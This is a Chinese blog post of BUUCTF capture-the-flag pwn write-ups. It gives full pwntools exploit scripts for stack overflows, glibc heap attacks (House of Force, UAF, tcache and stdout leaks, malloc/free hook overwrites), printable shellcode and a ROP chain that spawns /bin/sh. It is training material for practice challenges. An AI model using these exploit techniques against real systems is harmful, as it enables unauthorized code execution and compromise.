BUUCTF第三周 | Alex's blog~

wdb2018_guess

（较易）考点：

fork子进程
stack smashing
利用environ确定任意栈地址

def exp():
    ru("Please type your guessing flag")
    sl('a' * 0x128 + p64(elf.got['puts']))
    libc_base = uu64(ru("\x7f")[-6:]) - libc.sym['puts']
    environ = libc_base + libc.sym["__environ"]
    sla('Please type your guessing flag', 'a' * 0x128 + p64(environ))
    flag = uu64(ru("\x7f")[-6:]) - 0x168
    sla("Please type your guessing flag", 'a' * 0x128 + p64(flag))
    pass

gyctf_2020_force

（较难）考点：

mmap泄露堆地址
House of Force
realloc_hook调整栈帧使og生效

卡在了泄露地址这个点，学到了mmap出来的空间相邻libc的地址

house of force改top chunk的地址为-1(0xfff…)

然后无限申请，算下malloc_hook的偏移到topchunk，然后申请到附近改那两个hook

def exp():
    libc_base = add(0x200000, 'mmap') + 0x201000 - 0x10
    echo("base:" + hex(libc_base))
    one_addr = add(0x10, 'a' * 0x10 + p64(0) + p64(0xffffffffffffffff)) - 0x10
    size = (libc_base + libc.sym["__malloc_hook"]) - (one_addr + 0x20) - 0x40
    echo(hex(size))
    add(size, 'a')
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    binsh = add(0x40, '\x00' * 0x18 + p64(libc_base + og[1]) + p64(libc_base + libc.sym["__libc_realloc"] + 0x10))
    gdba()
    sla(menu, str(_add))
    sla("size", str(0xdead))
    pass

picoctf_2018_buffer overflow 0

（较易）考点：

栈溢出
signal调用后门函数

ssh连接到服务器，运行函数通过命令行传入参数然后泄露出flag

gyctf_2020_some_thing_interesting

（中等）考点：

UAF
堆布局构造unsorted bin

def exp():
    sa("> Input your code please:", "OreOOrereOOreO")
    add(0x30, p64(0) + p64(0x41),0x30, p64(0) + p64(0x41))
    add(0x30, 'aaaa', 0x30, 'bbbb')
    free(2)
    show(2)
    ru("RE is ")
    heap = uu64(io.recvuntil("\n", drop=True)[-6:]) - 0x80
    echo("heap:" + hex(heap))
    edit(2, '\x00', p64(heap + 0x10))
    payload = p64(0) * 4 + p64(0) + p64(0x91)
    add(0x30, p64(0) + p64(0x31), 0x30, payload)
    free(1)
    show(1)
    libc_base = uu64(ru("\x7f")[-6:]) - 88 - 0x10 - libc.sym["__malloc_hook"]
    echo("libc base:" + hex(libc_base))
    libc.address = libc_base

    add(0x60, 'a', 0x60, 'a')   # 3
    add(0x60, 'a', 0x60, 'b')   # 4
    free(4)
    edit(4, p64(0), p64(libc.sym["__malloc_hook"] - 0x23))
    
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    payload = 0x13 * '\x00' + p64(libc.address + og[3])
    add(0x60, 'a', 0x60, payload)

    # add(0x50, p64(0xdeadbeef), 0x40, 'hello')
    gdba()
    pass

mrctf2020_shellcode_revenge

（难）考点：

部分可见字符的shellcode编写

震撼我一整年

def exp():
    sa("Show me your magic!", "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")
    pass

X86:https://introspelliam.github.io/2017/09/30/pwn/%E5%85%A8%E6%98%AF%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode/

roarctf_2019_realloc_magic

（难）考点：

realloc函数的特性
堆布局
2.27下的IO泄露地址

总结：没有edit可以通过连续的free函数做uaf；由于不检查size，在只有heapptr的时候可以realloc(0)后构造overlap，覆盖victim的size，这样的效果可以使得逐个清空某个size大小的tcache bin，最终申请到freehook；泄露io直接申请到stdout的地方改writebase为0x58泄露IO-file-jumps的地址；爆破注意模板

def exp():
    dbg()
    add(0x60, 'a')
    add(0, '\x00')
    add(0xa0, 'a')
    add(0, '\x00')
    add(0x10, 'b')
    add(0, '\x00')
    add(0xa0, 'a')

    for i in range(7):
        free()
    add(0, '')
    add(0x60, '\x00')

    payload = 0x60 * 'a' + p64(0) + p64(0x41) + p8(0x60) + p8(0x97)
    add(0x110, payload)
    add(0, '')

    add(0xa0, '\x00')
    add(0, '')
    add(0xa0, p64(0xfbad1887) + p64(0) * 3 + p8(0x58))
    leak = u64(io.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8, '\x00')) - libc.sym["_IO_file_jumps"]
    echo("leak:" + hex(leak))
    if leak == -libc.sym["_IO_file_jumps"]:
        exit(-1)
    
    backdoor()
    __free_hook = leak + libc.sym["__free_hook"]
    add(0x30, 'a')
    free()
    add(0, '')

    add(0x110, 'a' * 0x68 + p64(0x51) + p64(__free_hook - 8))
    add(0, '')

    add(0x30, p8((__free_hook - 8) & 0xff))
    add(0, '')

    add(0x30, '/bin/sh\x00' + p64(leak + libc.sym["system"]))
    # free()
    gdba()
    ia()

if __name__ == '__main__':
    while True:
        # io = process(challenge,env = {"LD_PRELOAD":libc_path_local})
        io = remote("node4.buuoj.cn", 29747)
        try:
            exp()
        except:
            io.close()
            continue

强网杯2019 拟态 STKOF

（较易）考点

栈溢出
静态编译

ROPgadget生成的ropchain长度超了，ropper可以

def exp():

    p = lambda x : pack('Q', x)

    IMAGE_BASE_0 = 0x0000000000400000 # 40e64f05032527bd1aaaaf05161090bf0ee2f31afe5144cf358725e178579b73
    rebase_0 = lambda x : p(x + IMAGE_BASE_0)

    rop = ''

    rop += rebase_0(0x0000000000001d0d) # 0x0000000000401d0d: pop r13; ret; 
    rop += '//bin/sh'
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret; 
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000055ec9) # 0x0000000000455ec9: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x0000000000001d0d) # 0x0000000000401d0d: pop r13; ret; 
    rop += p(0x0000000000000000)
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret; 
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x0000000000055ec9) # 0x0000000000455ec9: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret; 
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000005895) # 0x0000000000405895: pop rsi; ret; 
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003d9d5) # 0x000000000043d9d5: pop rdx; ret; 
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003b97c) # 0x000000000043b97c: pop rax; ret; 
    rop += p(0x000000000000003b)
    rop += rebase_0(0x0000000000061645) # 0x0000000000461645: syscall; ret; 
    print rop

    payload = 'a' * 0x118
    payload += rop

    echo(hex(len(payload)))
    ru("We give you a little challenge, try to pwn it?")
    sd(payload)
    pass